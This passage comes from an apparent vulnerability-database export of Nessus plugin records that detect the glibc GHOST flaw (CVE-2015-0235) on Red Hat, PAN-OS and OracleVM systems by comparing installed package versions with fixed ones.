Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0099\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5\\.6|5\\.9|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9 / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0099\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-debuginfo-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-devel-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-devel-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-devel-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-static-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-static-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:48", "description": "The remote host is running a version of Palo Alto Networks PAN-OS equal to or prior to 5.0.15 / 6.0.8 / 6.1.2. It is, therefore, affected by a heap-based buffer overflow in the GNU C Library (glibc) due to improperly validating user-supplied input in the glibc functions __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2(). This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.", "cvss3": {}, "published": "2015-02-04T00:00:00", "type": "nessus", "title": "Palo Alto Networks PAN-OS <= 5.0.15 / 6.0.x <= 6.0.8 / 6.1.x <= 6.1.2 GNU C Library (glibc) Buffer Overflow (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2018-07-24T00:00:00", "cpe": ["cpe:/o:paloaltonetworks:pan-os"], "id": "PALO_ALTO_PAN-SA-2015-0002.NASL", "href": "https://www.tenable.com/plugins/nessus/81167", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81167);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/07/24 18:56:13\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Palo Alto Networks PAN-OS <= 5.0.15 / 6.0.x <= 6.0.8 / 6.1.x <= 6.1.2 GNU C Library (glibc) Buffer Overflow (GHOST)\");\n script_summary(english:\"Checks the PAN-OS version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Palo Alto Networks PAN-OS\nequal to or prior to 5.0.15 / 6.0.8 / 6.1.2. It is, therefore,\naffected by a heap-based buffer overflow in the GNU C Library (glibc)\ndue to improperly validating user-supplied input in the glibc\nfunctions __nss_hostname_digits_dots(), gethostbyname(), and\ngethostbyname2(). This allows a remote attacker to cause a buffer\noverflow, resulting in a denial of service condition or the execution\nof arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://securityadvisories.paloaltonetworks.com/Home/Detail/29\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"The vendor has not yet provided a patch at this time (2015/03/10).\n\nPlease contact the vendor regarding a patch or workaround.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:paloaltonetworks:pan-os\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Palo Alto Local Security Checks\");\n\n script_dependencies(\"palo_alto_version.nbin\");\n script_require_keys(\"Host/Palo_Alto/Firewall/Version\", \"Host/Palo_Alto/Firewall/Full_Version\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"Palo Alto Networks PAN-OS\";\nversion = get_kb_item_or_exit(\"Host/Palo_Alto/Firewall/Version\");\nfull_version = get_kb_item_or_exit(\"Host/Palo_Alto/Firewall/Full_Version\");\nfix = NULL;\n\n# Ensure sufficient granularity.\nif (\n version =~ \"^5(\\.0)?$\" ||\n version =~ \"^6(\\.[01])?$\"\n) audit(AUDIT_VER_NOT_GRANULAR, app_name, full_version);\n\nif (version =~ \"^6\\.1\\.\")\n cutoff = \"6.1.2\";\nelse if (version =~ \"^6\\.0\\.\")\n cutoff = \"6.0.8\";\nelse if (\n version =~ \"^[0-4]($|[^0-9])\" ||\n version =~ \"^5\\.0\\.\"\n)\n cutoff = \"5.0.15\";\nelse\n audit(AUDIT_NOT_INST, app_name + \" 0.x-4.x / 5.0.x / 6.0.x / 6.1.x\");\n\n# Compare version to fix and report as needed.\nif (ver_compare(ver:version, fix:cutoff, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + full_version +\n '\\n Fixed versions : See solution.' +\n '\\n';\n security_hole(extra:report, port:0);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app_name, full_version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:47:45", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - Fix parsing of numeric hosts in gethostbyname_r (CVE-2015-0235, #1183533).", "cvss3": {}, "published": "2015-01-30T00:00:00", "type": "nessus", "title": "OracleVM 3.3 : glibc (OVMSA-2015-0022) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:glibc", "p-cpe:/a:oracle:vm:glibc-common", "p-cpe:/a:oracle:vm:nscd", "cpe:/o:oracle:vm_server:3.3"], "id": "ORACLEVM_OVMSA-2015-0022.NASL", "href": "https://www.tenable.com/plugins/nessus/81103", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2015-0022.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81103);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n\n script_name(english:\"OracleVM 3.3 : glibc (OVMSA-2015-0022) (GHOST)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Fix parsing of numeric hosts in gethostbyname_r\n (CVE-2015-0235, #1183533).\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2015-January/000259.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?73666800\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc / glibc-common / nscd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"glibc-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 